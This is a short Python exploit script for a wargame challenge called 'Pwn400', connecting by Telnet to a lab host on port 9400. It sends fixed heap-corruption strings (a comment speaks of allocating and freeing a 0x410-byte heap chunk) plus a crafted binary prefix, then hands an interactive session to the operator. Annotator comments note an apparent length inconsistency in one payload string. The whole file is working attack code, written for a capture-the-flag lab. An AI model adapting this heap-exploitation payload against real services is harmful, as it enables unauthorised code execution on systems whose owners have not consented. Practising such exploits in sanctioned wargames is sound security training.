- #!/usr/bin/python
- from Pwning import *
class Pwn400(Payload):
    """Scripted client for the "Pwn400" wargame service.

    Builds on the ``Payload`` base class from the project-local ``Pwning``
    module. The constructor records the service address and creates the
    connection. ``pwnTarget`` then answers two rounds of the service's
    "Input string 1" / "Input string 2" prompts with fixed strings and
    hands the session over to the operator.
    """

    def __init__(self):
        """Record the target host, port and mode, then create the connection."""
        Payload.__init__(self)
        # presumably Payload.__init__ pre-populates self.host as an indexable
        # container; slot 1 is overwritten here -- verify against Pwning.
        self.host[1] = 'lab33.wargame.whitehat.vn'  # wargame lab host
        self.port = 9400  # service port on that host
        # Author's note: mode 1 is the x86 target platform. The paste also
        # carried a commented-out "self.mode = 1" labelled x86_64, i.e. the
        # same value for both platforms -- NOTE(review): confirm which value
        # Pwning expects for x86_64.
        self.mode = 1
        self.conn = Telnet(self.host[1], self.port)

    def pwnTarget(self):
        """Run the two prompt/response rounds, then go interactive and close.

        Every string is built up front; the exchange itself is a fixed
        sequence of "wait for prompt(s), send data" steps in the order the
        service asks for them.
        """
        # Round 1, string 1. Author's note: "create heap with size 0x410,
        # and free it". Length is 2 + 1022 = 1024 characters.
        round1_first = "u#" + "A" * 1022
        # Round 1, string 2: 3 + 1021 = 1024 characters.
        round1_second = "AA#" + "D" * 1021

        # Round 2, string 1: a 31-character prefix followed by filler.
        prefix = "".join([
            "o<1060>",
            "\x00\x80" * 7,
            "\x00\x88",
            "\x00\x10",
            "\x56\x01",
            "\x08\x01",
            "\x40\x01",
        ])
        # NOTE(review): the filler count is taken from the prefix length
        # *before* the two-character "\x00\x05" is appended, so this string
        # ends up 1026 characters long while the other three are 1024 --
        # confirm that is intended.
        round2_first = prefix + "\x00\x05" + "B" * (1024 - len(prefix))
        # Round 2, string 2: plain filler, 1024 characters.
        round2_second = "B" * 1024

        # (prompts to wait for, data to send) in the order the service asks.
        steps = (
            (('Input string 1\n',), round1_first),
            (('Input string 2\n',), round1_second),
            (('Processing\n', 'Input string 1\n'), round2_first),
            (('Input string 2\n',), round2_second),
        )

        link = self.conn
        for prompts, data in steps:
            for prompt in prompts:
                link.read_until(prompt)
            link.writeRawData(data)

        # Hand the session to the operator, then drop the connection.
        link.interact()
        link.close()
# Script entry point: constructing Pwn400 creates the Telnet connection in
# __init__, and pwnTarget() runs the prompt/response exchange, switches to
# interactive mode and closes the connection afterwards.
pwn400 = Pwn400()
pwn400.pwnTarget()